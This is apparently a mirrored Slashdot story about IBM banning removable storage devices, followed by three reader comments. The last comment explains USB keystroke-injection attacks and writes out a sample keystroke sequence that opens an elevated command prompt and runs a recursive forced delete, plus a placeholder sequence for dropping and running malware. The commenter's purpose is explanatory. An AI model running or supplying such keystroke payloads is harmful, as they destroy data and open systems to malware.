Slashdot Mirror

← Back to Stories (view on slashdot.org)

IBM Bans Staff From Using Removable Storage Devices (theregister.co.uk)

Posted by msmash on from the in-the-meanwhile dept.

An anonymous reader shares a report: In an advisory to employees, IBM global chief Information security officer Shamla Naidoo said the company "is expanding the practise of prohibiting data transfer to all removable portable storage devices (eg: USB, SD card, flash drive)." The advisory stated some pockets of IBM have had this policy for a while, but "over the next few weeks we are implementing this policy worldwide." Big Blue's doing this because "the possible financial and reputational damage from misplaced, lost or misused removable portable storage devices must be minimised." IBMers are advised to use Big Blue's preferred sync 'n' share service to move data around.

3 of 167 comments (clear)

  1. Re:Lost Productivity by Joe_Dragon · · Score: 3, Informative

    windows GPO to force bit locker on usb mass storage

  2. Re:Lost Productivity by Baton+Rogue · · Score: 4, Informative

    Each USB device is identified independently of each other. If you plug in a USB keyboard that also has a USB port with a flash drive plugged in, the computer will see two different devices and only lock out the flash drive.

    If you are suggesting that someone can create a flash drive that the computer thinks is a keyboard, then the computer will not mount the drive to be written to since it knows that it cannot write data to a keyboard.

  3. Re:Lost Productivity by sexconker · · Score: 3, Informative

    This is a real attack vector that exists in the real world. Slashdot has covered this multiple times.

    Someone creates a device that looks like a flash drive.
    Internally, it is a keyboard, or a keyboard AND flash drive.
    When plugged in, even a "secured" system that blocks removable storage devices will typically allow other USB devices (such as keyboards).
    The OS will happily accept input from the thing as if it were a keyboard with keys pressed by a human, even though the key presses are all prerecorded payloads stored on the device.

    As such, the keyboard can go to town and so shit like:

    Windows Key
    cmd
    CTRL+SHIFT+Enter
    Left
    Enter
    del /f /s /q /*.*
    Enter

    Or just spit out and run any malware payload:
    Windows Key
    cmd
    CTRL+SHIFT+Enter
    Left
    Enter
    ECHO MalwarePayload > GetFukt.exe
    Enter
    GetFukt.exe
    Enter
    exit
    Enter